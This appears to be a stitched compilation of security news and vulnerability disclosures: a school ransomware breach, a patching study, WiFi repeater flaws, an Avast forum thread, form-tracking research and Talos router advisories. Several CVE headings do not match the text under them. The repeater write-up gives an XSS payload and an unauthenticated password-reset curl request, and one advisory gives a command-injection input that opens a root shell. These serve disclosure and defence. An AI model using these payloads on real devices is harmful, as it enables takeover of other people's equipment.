A recent breach notification has revealed some 490,000+ students were impacted by a ransomware attack last December.
The post Chicago students lose data to ransomware attackers appeared first on Malwarebytes Labs.

Chicago Public Schools (CPS) disclosed on Friday that students may have had their data taken in a ransomware incident involving one of its vendors.

The ransomware attack happened last December at Battelle for Kids (BfK), based in Columbus Ohio, which develops services to provide innovation in schools for students and teachers.

**Breaching education**

Around 490,000 students and 56,000 employees found their data breached by those responsible for the ransomware. The data accessed by criminals, stretching from 2015 to 2019, included a variety of information potentially including:

*   Name
*   School
*   CPS email
*   Employee ID number
*   Battelle for Kids username

The notification breach says that home addresses, health/financial information, and social security numbers were not exposed.

Chicago Public Schools is offering free credit monitoring for those affected.

**A late notification**

The breach occurred in December but the notification did not, which raises several questions related to lateness of notification for those impacted. According to Bleeping Computer, the CPS contract with BfK means immediate notification of any data breach.

Despite this, it took no fewer than _four months_ to get word out that something had occurred. Letters pertaining to the breach were sent out towards the end of April. The reason for this is that it took this long to verify the breach had actually taken place. That isn’t all, however. Other breaches related to the compromise of Battelle for Kids suggests private student data was revealed “as far back as 2011”.

According to the Chicago Sun Times, a spokesperson for CPS says the breach was “caused \[and\] exacerbated by BfK’s failure to follow the information security terms of their contract”. They go on to single out a failure to encrypt data and purge old records. We talk about ransomware breaches often, and frequently mention the benefits of having a sensible back-up plan. This sounds like a case which may well have benefited greatly from this approach.

**Schools: a ripe target for ransomware**

All forms of education are an increasingly popular place to be for ransomware criminals. Schools, Universities, and (as we see above) third-party organisations are all valid targets. Even if the schools have a watertight security setup, it may not be the case for external suppliers and other entities interacting with the data in some way.

Outbreaks in schools and universities may not be life-threatening in the way attacks on the healthcare sector can be. However, severe delays to applications, operations, and teaching generally can have a big impact on students.

**Tips to avoid ransomware**

*   **Keep devices updated**. Secure your devices with the latest updates and patches. It’s not just the Operating System you have to consider here. Outdated software and applications are frequently the launchpad for exploits leading to ransomware attacks.
*   **Update your security software**. Often your first line of defence, help it to help you by automating updates and scans.
*   **Strengthen remote access**. A common ransomware pitfall is leaving remote services unsecured. Provide a limit on password guess attempts for remote desktops. You can also combine remote services with multifactor authentication.
*   **Avoid strange attachments**. Booby-trapped Word/Excel documents are a big threat in these realms, especially where Macros are concerned.
*   **Browser controls for bad ads**. Malvertising is another method for dropping ransomware onto systems. Restricting certain features like JavaScript will help, though this may make some sites unusable in places. Dedicated extensions which control scripts more generally, tracking, or untrustworthy ad networks will also help.
*   **Encrypt and back it up**. Keep your data encrypted whenever possible, and get into the habit of backing up regularly. Store backups externally, away from the main network. Ensure your backups are stored in a logical way and not a confused mess of folders and files, so you can easily find and restore files if you need to.

Chicago students lose data to ransomware attackers

Organizations that deploy updates only after a vulnerability is disclosed apply far fewer updates and do so at a lower cost than those that stay up to date on all of their software, university researchers say.

Analysis has surfaced what many would consider a surprising insight: Organizations that always update to the newest versions of all of their software have roughly the same risk of being compromised in cyber-espionage campaigns as those that apply only specific updates after a vulnerability is disclosed.

A quantitative look at data from 350 advanced persistent threat (APT) campaigns between 2008 and 2020 by researchers from University of Trento, Italy, shows that organizations with a purely reactive software update strategy had roughly the same risk exposure to advanced cyberattacks as those that keep up to date on everything. This is despite the fact that the subjects deployed only 12% of the updates that organizations that always updated immediately did.

The data shows that the same holds true for organizations that might apply updates to patch vulnerabilities based on information they have received in advance — for example, by paying for information about zero-days. Even these entities do not have a significant advantage over those that patch only on a reactive basis when it comes to breach risk, the study shows.  

**Why Reactive Patching Might Be OK for APTs  
**Though this flies in the fact of conventional wisdom, the study results reflect two realities: 1) APTs tend to be reactionary themselves, and 2) time-to-patch metrics matter.

In analyzing some 350 campaigns dating back to 2008 (including information on vulnerabilities exploited, attack vectors, and affected software products), researchers found that APTs targeted publicly disclosed vulnerabilities more often than they did zero-days, overall. They also tended to frequently share or target the same known vulnerabilities in their campaigns.

In all, the researchers identified 86 different APT groups exploiting a total of 118 unique vulnerabilities in their campaigns between 2008 and 2020. Just eight of these threat groups used exclusive vulnerabilities in their campaigns: Stealth Falcon, APT17, Equation, Dragonfly, Elderwood, FIN8, DarkHydrus, and Rancor.

That means there's an opportunity for IT teams to prioritize those bugs that are known to be APT favorites, in order to eliminate most of the risk of compromise.  

**Risk Remains Roughly the Same  
**Organizations that can apply software updates as soon as they're released naturally still face the lowest odds of being compromised, the study showed. However, the need to do regression testing before applying an update means that entities often take far longer to update their software. It's here that the researchers found little difference in risk exposure between those that apply all software updates, those that apply on a reactive basis, and those that update based on information they might have received in advance of others.

After all, the advantage of receiving vulnerability information in advance goes away completely the longer an organization takes to act upon the information.

For example, organizations that applied all software updates within one month of the updates being released were roughly at between five and six times higher risk of being compromised than organizations that updated immediately. That number was lower than (but not significantly so) for those that patched on a reactive basis (roughly between five-and-a-half to seven times higher risk); and those acting upon advance information (approximately between five and seven times higher).

The researchers found that organizations which acted on a reactive basis deployed far fewer updates than those that applied all updates. "Waiting to update when a CVE is published presents eight times fewer updates," the researchers said. "Thus, if an enterprise cannot keep up with the updates and needs to wait before deploying them, it can consider being simply reactive \[as an alternative\]."

**A Critical Issue  
**The issue of patch prioritization has become increasingly critical for resource- and time-strapped IT departments and security organizations. The growing use of open source components — many with vulnerabilities in them — has only exacerbated the problem. A study that Skybox Research Lab conducted last year showed a total of 20,175 vulnerabilities were disclosed in 2021. Another study by Kenna Security showed that nearly 95% of all enterprise assets contain at least one exploitable vulnerability. The trend has heightened interest in risk-based patch prioritization and pushed the US Cybersecurity and Infrastructure Agency to publish a catalog of exploited vulnerabilities so organizations know on which ones to focus first.

For its part, the University of Trento study specifically focused on the effectiveness and cost of different software update strategies for five widely used enterprise software products: Office, Acrobat Reader, Air, JRE, and Flash Player for the Windows OS environment.

"In summary, for the broadly used products we analyzed, if you cannot keep updating always and immediately (e.g., because you must do regression testing before deploying an update), then being purely reactive on the publicly known vulnerable releases has the same risk profile than updating with a delay, but costs significantly less," the researchers said.

Partial Patching Still Provides Strong Protection Against APTs

Pix-Link MiNi Router 28K.MiniRouter.20190211 was discovered to contain a stored cross-site scripting (XSS) vulnerability due to an unsanitized Security Key parameter.

Security analysis of some low-cost WiFi Repeaters

Many of us have had to choose a WiFi repeater to extend the wireless coverage of home routers. Nowadays, such device types are spreading fast and sometimes low-cost and poorly configured ones might severely harm the security and privacy of your home network, including devices commonly attached to it.

The problem is exacerbated by the huge amount of vendors selling these devices at quite low prices, which render them the most attractive choice for majority of the people. However, what most people should be aware of is that their low-cost devices might lead to… well.. other kind of costs!  
Unfortunately, sometimes these costs may be higher than if you had chosen a different, more expensive device.

_Why_ these devices?

*   They are not _too_ expensive (about 15€).  
    Thus, they are the most attractive choice for less-aware customers.
*   They are among the very first results provided by Amazon (not just the Italian version) when you search for keywords like “WiFi Repeater/Extender”.
*   At the time of writing, the second device was considered an Amazon’s Choice (Amazon IT). Therefore, most likely, many of them have already been sold.

The following sections summarize the vulnerabilities I found as a result of my analysis. The next section will briefly discuss, for each device analyzed, the vulnerabilities with an assigned CVE ID I’ve been able to found as well as other minor security-related issues affecting the involved devices.

To fix such vulnerabilities you should update your device’s firmware to the latest available version but sometimes, with poorly configured firmwares (perhaps bugs?!), you won’t even be allowed to download software updates, leaving you with only two choices: either you stay vulnerable or you replace the device at all.

Device (**1/3**): Acexy Wireless-N WiFi Repeater REV 1.0  
Firmware: 28.08.06.1

****CVE-2021–28160 — SSID Reflected XSS****

As with every WiFi Repeater, you have to choose the wireless network which range you wish to extend, providing the password (if any) of its wireless AP.

The page shown above, “/repeater.html”, allows to select the network and displays the available wireless APs without applying any kind of sanitization on the data included into the HTML page, which is rendered by the browser.

Therefore, by modifying the SSID of a wireless network such as the following you can achieve JavaScript code executed every time a user visit the page _repeater.html_ or, more in general, when a user just click on the “Repeater Wizard” section on the homepage.

<img src=no onerror=alert(1) foo

**CVE-2021–28936— Improper Access Control on password reset requests**

An Improper Access Control (CWE-284) vulnerability allows any device to change the Web management interface password by sending just one specially crafted HTTP GET request, without requiring any previous authentication.

In order to exploit the vulnerability you need to know the current management interface account name (by default**_,_** it is **_admin_**).  
The following curl command change the management interface password to “_mystrongpass123_”, assuming the account name is _admin_ and the IP address of the device is the default one (192.168.10.1).

curl -i -s -o /dev/null -w "%{http\_code}" -k -X $'GET' \\  
    -H $'Host: 192.168.10.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: \*/\*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://192.168.10.1/password.html' -H $'Content-Length: 4' \\  
    --data-binary $'\\x0d\\x0a\\x0d\\x0a' \\  
    $'**http://192.168.10.1/login.htm**?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=**admin**&SET2=16843264=**mystrongpass123**&rd=0.7548039925199851&\_=1615725324336'

Once the request is handled successfully, just try to login with the password you provided earlier.

**CVE-2021–28937— Plaintext password reflected in /password.html page**

The web management interface password is included in the /_password.html_ HTML page, which contains a form for changing the username and the password.

To exploit this vulnerability just visit the URL _http://192.168.10.1/password.html_ and inspect the returned HTML element with any browser you prefer.

This kind of password disclosure also implies the device stores the password as a plaintext, without computing any hash value.

**Others**

*   HTTPS is never used and HTTP traffic can be easily intercepted on a LAN.

Username and password are sent unencrypted during authentication and, additionally, every time you visit _/password.html_ you give to a potential attacker the chance to read your current username and password (both included in the HTML document).

*   Telnet service listening on port 23.

The default username is easy to guess (**_admin_**) but the password is not among the most trivial or common ones. I didn’t manage to guess the password though you might be luckier, or just better than me at generating password lists.

**Device** (**2/3**): SOOTEWAY Wi-Fi Range Extender V1.5  
Firmware: apparently no firmware updates  
Arch: MIPS

**CVE-2021–30028 — Weak credentials lead to remote firmware read/write/erasure**

The device shown above also has some vulnerabilities.  
In particular, a Telnet service is listening on port 23 and default credentials are among the most common ones (**admin**:**admin**). However, what is worse is that after the login succeeds, the service provides a complete set of instructions that allows a potential adversary to do literally anything with your WiFi Repeater. He might be able to modify the device configuration like changing the repeater password, modify CPU registers values and even flash/overwrite the firmware. All of these can be done remotely.

For instance, it would be possible to compromise the device forever, overwriting part of the firmware and preventing the factory reset. The following two screenshots show the things an attacker would have access to and also one way he could stop the correct functioning of the device _permanently_.

From this moment on, the WiFi Repeater becomes literally useless and must be replaced. Finally, it appears that no firmware update is foreseen, therefore you should either buy a new device or keep your vulnerable one as it was mentioned initially.

**Device** (**3/3**): Pix-Link MiNi Router  
Firmware: v28K.MiniRouter.20190211

The firmware installed on this device also does not sanitize user-supplied input. This led to the discovery of two stored XSS vulnerabilities (**CVE-2021–43728** and **CVE-2021–43729**) affecting the SSID and wireless security key values respectively.

To replicate the simple XSS _alert_ POC just intercept the request sent when you _Apply_ changes from _Advance>Wireless_ setting page through a proxy (e.g. Burp community will suffice). Note that intercept/modify is required to overcome the character limitation.

Once our crafted value is set it will be enough to visit the extender home page to trigger the JS alert as depicted by the next screenshot.

Regarding the second issue (CVE-2021–43729):  
\- Enter your XSS payload in the same Wireless setting page mentioned above  
\- Apply changes

Then just connect back to the WiFi extender providing the payload itself as password. The JS alert will spawn as soon as the home page is visited:

**Conclusion**

When a software/hardware device, or a product in general, is sold at much lower prices than others there are usually reasons. Such reasons may vary, including bad implementation choices, less development or testing effort and security vulnerabilities too. However, since even the most expensive devices might be vulnerable you should (at least) try to choose wisely when it comes to your home network security.

There are plenty more expensive WiFi extenders I might suggest, such as this one by TP-Link. However, I’d like to avoid so since even that one has an interesting client-side encryption which should be reversed to see what it’s intended to hide :)

CVE-2021-43729: Hunting for Vulnerabilities in Low-Cost WiFi Repeaters

An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

CVE-2022-28964: NEW Avast Version 22.1 (January 2022)

Data harvested without consent and before forms are submitted in many cases, researchers claim

Data harvested without consent and before forms are submitted in many cases, researchers claim

Email addresses typed into online forms are often handed over to web trackers before being submitted and without user consent, a systematic study by computer scientists has discovered.

Email addresses – or identifiers derived from them – are apparently being used by data brokers and advertisers for cross-site and cross-platform identification of computer users.

As part of an investigation into how data from online forms is used for tracking, a team of four computer scientists measured the extent of email and password collection prior to form submission by analyzing the top 100,000 websites.

Catch up on the latest privacy-related security news and analysis

The researchers – Asuman Senol from KU Leuven in the Netherlands, Mathias Humbert (University of Lausanne, Switzerland), and Gunes Acar and Frederik Zuiderveen Borgesius (both from Radboud University, Belgium) – compared results from two vantage points, in the US and EU, as well as between mobile and desktop browsers.

**Tracking domains**

The team found that email addresses were exfiltrated to tracking domains before form submission and without giving consent on 1,844 websites in the EU crawl and 2,950 websites in the US crawl.

In the majority of cases, data was extracted to well-known tracker domains, but the researchers also identified 41 tracker domains omitted from popular blocklists.

Profiling for ad-serving purposes is not the only concern.

The researchers also identified seemingly inadvertent password collection from 52 websites by third-party relay scripts.

A research paper (PDF) based on the study is due to be presented at the upcoming Usenix ’22 security conference.

INSIGHT Research has come a long way, but gaps remain – security researcher Artur Janc on the state of XS-Leaks

Web users typically enter their email addresses into online forms for reasons including signing up to a service or subscribing to a newsletter.

The research shows that any data entered into such forms may end up in the hands of data brokers – sometimes even in cases where individuals have second thoughts about signing up to something and didn’t hit ‘send’.

The researchers used an online crawler to systematically examine what happens when users close their session before submitting data entered on forms.

**GDPR violation concerns**

Although not a lawyer, Gunes Acar, one of the four main researchers on the project, told The Daily Swig that the behavior of some of the websites may be in violation of stricter data privacy regulations such as the European Union’s General Data Protection Regulation (GDPR).

“Surreptitious email exfiltration for tracking purposes may breach some GDPR principles such as transparency, purpose limitation, and legal basis, but we cannot say for certain whether individual websites violate the GDPR (or other laws) without looking at the specifics,” Acar explained.

Almost half of the websites contacted responded to the researchers’ GDPR-related requests (see response sample here).

“Some websites said they didn’t know that their visitors’ emails were collected by third parties, and they fixed the issue,” Acar said. “That was the most positive outcome.

“Other websites informed us how they were using the emails collected through this behavior,” they added.

**Countermeasures**

Privacy-conscious internet users might well recoil from the revelations, as summarized in a blog post featuring screen captures and videos.

Fortunately, some countermeasures are already available.

Acar explained: “Adblockers (e.g. uBlock Origin) and privacy-focused browsers (Brave, DuckDuckGo) block requests to tracker and advertising domains, and hence may prevent this type of data collection. Only blocking the cookies wouldn’t provide any protection.

“Email relay services may be used to avoid giving the same email address to different online and offline businesses. Apple, DuckDuckGo, and Mozilla offer such services, which can be used to generate alias addresses,” Acer concluded.

The researchers have developed a proof-of-concept browser plugin, LeakInspector, which informs users when their email and passwords are scraped from forms, in addition to blocking “leaky” requests to tracker domains.

“Unfortunately, the add-on is not available on Chrome Web Store, because it relies on APIs that Google disallows in Manifest v3,” Acar said. “We are working on publishing the add-on to Firefox’s add-on repository.”

RECOMMENDED Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

Popular websites leaking user email data to web tracking domains

An OS command injection vulnerability exists in the console infactory_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An OS command injection vulnerability exists in the console infactory\_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

    ************************************************
            Welcome to Router console
        Inhand
        Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
        http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    show           -- show system information
    exit           -- exit current mode/console
    ping           -- ping test
    comredirect    -- COM redirector
    telnet         -- telnet to a host
    traceroute     -- trace route to a host
    enable         -- turn on privileged commands
    infactory      -- factory mode
    Router>
    

The infactory command permits, provided the correct password, the access to the factory mode view. This mode permits to change the configuration and perform various tests. The factory mode view:

    Router> infactory 
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    exit           -- exit current mode/console
    reboot         -- reboot system
    factory-model  -- hardware model configure
    modem          -- modem test
    reset-key      -- check the status of the reset button
    com            -- detecting serial ports
    port           -- FCT network port test
    net            -- complete machine network port test
    led            -- LED lights test
    wlan           -- Wi-Fi test
    mem            -- check memory
    hw_wdg         -- check the hardware watchdog status
    dio            -- detect digital I/O
    stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

This mode offers several functionalities. For instance, the net functionality allows to essentially execute a ping command specifying its interface parameter.

The net_functionality:

    undefined4 net_functionality(undefined4 param_1,int args)
    
    {
        [...]
        
        argument_list_ptr[0] = args;
        [...]
        if (argument_list_ptr[0] != 0) {
            first_arg = (char *)maybe_get_next_token(argument_list_ptr);
            if (*first_arg != '\0') {
                is_init = strncmp(first_arg,"init",4);
                if (is_init == 0) {
                    [...]
                }
                is_test = strncmp(first_arg,"test",4);
                if ((is_test == 0) &&
                    (interface = (char *)maybe_get_next_token(argument_list_ptr), 
                    interface != (char *)0x0)) {                                                            [1]
                    max_args = 3;
                    packets_count = 0;
                    timeout_ = 0;
                    target_ip = (char *)0x0;
                    [... here are parsed 3 optional parameters ...]
                    snprintf((char *)&ping_command,0x80,"ping -I %s -c %d -W %d %s",interface,packets_count,
                            timeout,target_ip);                                                             [2]
                    popen_stream = popen((char *)&ping_command,"r");                                        [3]
                    [...]
    }
    

If the first provided argument is test, then the second one, parsed at [1], will be later used at [2] to form the string ping -I <second_arg> -c <packets_count> -W <timeout> <target_ip>. This string will later be used at [3] as argument of the popen function.

The second argument is not properly sanitized, and a command injection can occur at [3]. An attacker, able to reach the net functionality, would be able to obtain a root shell.

**Exploit Proof of Concept**

Provided the command net test ;/bin/sh;, in the factory mode view, a root shell will be obtained:

    Router(factory)# net test ;/bin/sh;
    ping: option requires an argument -- I
    BusyBox v1.26.2 (2022-02-23 16:03:56 CST) multi-call binary.
    
    Usage: ping [OPTIONS] HOST
    help
    Built-in commands:
    ------------------
        . : [ [[ break cd chdir continue echo eval exec exit export false
        hash help history let local printf pwd read readonly return set
        shift source test times trap true type ulimit umask unset wait
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-30 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-26518: TALOS-2022-1501 || Cisco Talos Intelligence Group

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

**CWE**

CWE-259 - Use of Hard-coded Password

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers the telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
      infactory      -- factory mode
    Router> 
    

A low-privileged user can login into this service. The Router console contains a command, called infactory. This functionality will request a password; if correct, a menu with several functions is accessed.

The infactory_command:

    undefined4 infactory_command(undefined4 param_1,char *provided_password)
    
    {
     [...]
    
      if ((provided_password == (char *)0x0) || (*provided_password == '\0')) {
        provided_password = password_in_stack;
        uVar2 = get_help_string("input_pass");
        get_pass_wrap(uVar2,provided_password,0x40);
      }
      aes_decrypt_str(<REDACTED>,0x40,decrypted_password,0x80);                                             [1]
      password_len = strlen(decrypted_password);
      iVar1 = strncmp(decrypted_password,provided_password,password_len);                                   [2]
      if (iVar1 == 0) {
        change_view(view_cursor,&view_infactory);                                                           [3]
        return 0;
      }
      [...]
    }
    

This function will first, at [1], decrypt a hard-coded hex encoded string. Then, if the comparison between the described string and the provided password, at [2], returns zero, meaning the two string are equal, then the code at [3] will be reached. Then the “view” will be changed, which means that the available commands will change.

The aes_decrypt_str:

    undefined4 aes_decrypt_str(char *data,uint data_len,char *output_buff)
    {
      [...]
      IV._0_4_ = 0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      if ((data_len & 0x1f) == 0) {
        __size = (int)data_len / 2;
        data_bin = malloc(__size);
        if (data_bin == (void *)0x0) {
          syslog(3,"out of memory!");
          uVar1 = 0xffffffff;
        }
        else {
          str2bin(data,__size,data_bin);
          AES_set_key(AES_key,<REDACTED>,128);                                                              [4]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_bin,output_buff,__size,IV,0);
          free(data_bin);
        }
      }
      [...]
    }
    

The hard-coded data provided at [1] are decrypted, at [4], using AES with a hard-coded key. An attacker, in possession of low-privileged user credentials, would be able to access the infactory functionalities.

**Exploit Proof of Concept**

Using the infactory command and providing the correct password will list the infactory functionalities:

    Router> infactory
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      exit           -- exit current mode/console
      reboot         -- reboot system
      factory-model  -- hardware model configure
      modem          -- modem test
      reset-key      -- check the status of the reset button
      com            -- detecting serial ports
      port           -- FCT network port test
      net            -- complete machine network port test
      led            -- LED lights test
      wlan           -- Wi-Fi test
      mem            -- check memory
      hw_wdg         -- check the hardware watchdog status
      dio            -- detect digital I/O
      stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-28 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-27172: TALOS-2022-1496 || Cisco Talos Intelligence Group

Attack technique bypasses email filters and burnishes credibility of phishing links

Attack technique bypasses email filters and burnishes credibility of phishing links

A failure to validate subdomains within so-called ‘vanity URLs’ by Box, Zoom, and Google Docs created a powerful way to enhance their phishing campaigns, security researchers have revealed.

Vanity URLs can be customized to include a brand name and a description of the link’s purpose (for example, brandname/registernow) and typically redirect to a longer, generic URL.

Widely used by software-as-a-service (SaaS) applications, vanity URLs are used to share or request files, invite users to register for events, and so on.

**False sense of security**

The vulnerabilities discovered in Box, Zoom, and Google Docs enable attackers to abuse the apparent reassurance vanity URLs offer recipients that they are dealing with a legitimate organization rather than cybercriminals.

Researchers from Varonis Threat Labs found that the SaaS applications validated vanity URLs’ URI (the unique sequence of characters at the end of the link), but not its descriptive subdomain (the portion preceding the URI).

Read more of the latest phishing news and attacks

“As a result, threat actors can use their own SaaS accounts to generate links to malicious content (files, folders, landing pages, forms, etc.) that appears to be hosted by your company’s sanctioned SaaS account,” reads a blog post published by Varonis Threat Labs.

“Achieving this is as easy as changing the subdomain in the link.”

**Hit rate**

This attack technique, as demonstrated in this video, would act to massively boost the success rate of phishing or malware distribution campaigns, according to Varonis CMO Rob Sobers.

